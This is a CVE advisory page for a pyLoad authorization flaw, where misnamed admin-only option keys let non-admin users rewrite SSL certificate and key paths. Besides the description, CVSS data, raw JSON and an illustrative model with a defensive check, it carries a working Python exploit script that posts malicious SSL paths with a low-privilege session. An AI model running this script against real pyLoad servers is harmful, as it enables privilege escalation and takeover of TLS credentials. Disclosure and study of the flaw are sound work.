Security Vulnerability Report
CVE-2026-35586 CVSS 6.8 MEDIUM

CVE-2026-35586

Published: 2026-04-07 17:16:34
Last Modified: 2026-04-16 18:54:33

Description

pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev97, the ADMIN_ONLY_CORE_OPTIONS authorization set in set_config_value() uses incorrect option names ssl_cert and ssl_key, while the actual configuration option names are ssl_certfile and ssl_keyfile. This name mismatch causes the admin-only check to always evaluate to False, allowing any user with SETTINGS permission to overwrite the SSL certificate and key file paths. Additionally, the ssl_certchain option was never added to the admin-only set at all. This vulnerability is fixed in 0.5.0b3.dev97.
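A simplified model of the flaw described above, added here as an illustration and not taken from pyLoad's source. The option names come from the description; CONFIG_SCHEMA, the user dictionaries, the two ADMIN_ONLY_* variants and the helpers stale_names and try_change are assumptions. It puts the mismatched set beside a corrected one and adds a consistency check that flags admin-only names matching no real option.

```python
# Simplified model of the authorization check; not pyLoad's actual code.
# Option names are from the advisory text; everything else is assumed.

# Constructed stand-in for the real configuration schema.
CONFIG_SCHEMA = {"ssl_certfile", "ssl_keyfile", "ssl_certchain", "language"}

# Before the fix: names that exist nowhere in the schema, ssl_certchain absent.
ADMIN_ONLY_VULNERABLE = frozenset({"ssl_cert", "ssl_key"})
# After the fix: the real option names, including the chain file.
ADMIN_ONLY_FIXED = frozenset({"ssl_certfile", "ssl_keyfile", "ssl_certchain"})


def stale_names(admin_only, schema=CONFIG_SCHEMA):
    """Return admin-only entries that match no real option (dead guards)."""
    return sorted(set(admin_only) - set(schema))


def set_config_value(config, user, option, value, admin_only):
    """Apply a change if the caller is allowed; raise PermissionError otherwise."""
    if option not in CONFIG_SCHEMA:
        raise KeyError(option)
    if "SETTINGS" not in user["perms"] and not user["is_admin"]:
        raise PermissionError("SETTINGS permission required")
    # The membership test is only as good as the names stored in the set.
    if option in admin_only and not user["is_admin"]:
        raise PermissionError(f"{option} is admin-only")
    config[option] = value


def try_change(user, option, admin_only):
    """Return True if the change was accepted, False if it was refused."""
    try:
        set_config_value({}, user, option, "/constructed/path.pem", admin_only)
        return True
    except PermissionError:
        return False


if __name__ == "__main__":
    settings_user = {"perms": {"SETTINGS"}, "is_admin": False}  # constructed
    for name, guard in (("vulnerable", ADMIN_ONLY_VULNERABLE), ("fixed", ADMIN_ONLY_FIXED)):
        accepted = [o for o in sorted(ADMIN_ONLY_FIXED) if try_change(settings_user, o, guard)]
        print(name, "stale:", stale_names(guard), "accepted for non-admin:", accepted)
```

Running a check like stale_names at startup or in a unit test turns a silent name drift between the guard set and the schema into a visible failure.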

CVSS Details

CVSS Score: 6.8
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:pyload-ng_project:pyload-ng:*:*:*:*:*:python:*:* - VULNERABLE
pyLoad < 0.5.0b3.dev97

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Exploit Title: pyLoad < 0.5.0b3.dev97 - SSL Configuration Privilege Escalation
# Description: Bypass admin-only checks to overwrite SSL certificate paths.

target_url = "http://127.0.0.1:8000/api/set_config_value"

# Attacker's cookie (User with 'SETTINGS' permission, NOT 'ADMIN')
attacker_cookie = {
    "pyload_session": "valid_low_privilege_session_token"
}

# The vulnerable payload.
# The code checks for 'ssl_cert' in ADMIN_ONLY_CORE_OPTIONS,
# but the actual config key is 'ssl_certfile', causing the check to fail.
malicious_payload = {
    "ssl_certfile": "/path/to/malicious/cert.pem",
    "ssl_keyfile": "/path/to/malicious/key.pem",
    "ssl_certchain": "/path/to/malicious/chain.pem"
}

try:
    response = requests.post(target_url, json=malicious_payload, cookies=attacker_cookie)
    if response.status_code == 200:
        print("[+] Success: SSL configuration overwritten via privilege bypass.")
        print(f"[+] Response: {response.text}")
    else:
        print(f"[-] Failed: HTTP {response.status_code}")
except Exception as e:
    print(f"[-] Error: {e}")
```

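References

https://github.com/pyload/pyload/security/advisories/GHSA-ppvx-rwh9-7rj7 (Exploit, Vendor Advisory)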

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35586", "sourceIdentifier": "[email protected]", "published": "2026-04-07T17:16:34.140", "lastModified": "2026-04-16T18:54:32.687", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev97, the ADMIN_ONLY_CORE_OPTIONS authorization set in set_config_value() uses incorrect option names ssl_cert and ssl_key, while the actual configuration option names are ssl_certfile and ssl_keyfile. This name mismatch causes the admin-only check to always evaluate to False, allowing any user with SETTINGS permission to overwrite the SSL certificate and key file paths. Additionally, the ssl_certchain option was never added to the admin-only set at all. This vulnerability is fixed in 0.5.0b3.dev97."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pyload-ng_project:pyload-ng:*:*:*:*:*:python:*:*", "versionEndIncluding": "0.5.0b3.dev96", "matchCriteriaId": "0F5DE8DC-98B9-4A24-89F9-C2FEFD254815"}]}]}], "references": [{"url": "https://github.com/pyload/pyload/security/advisories/GHSA-ppvx-rwh9-7rj7", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}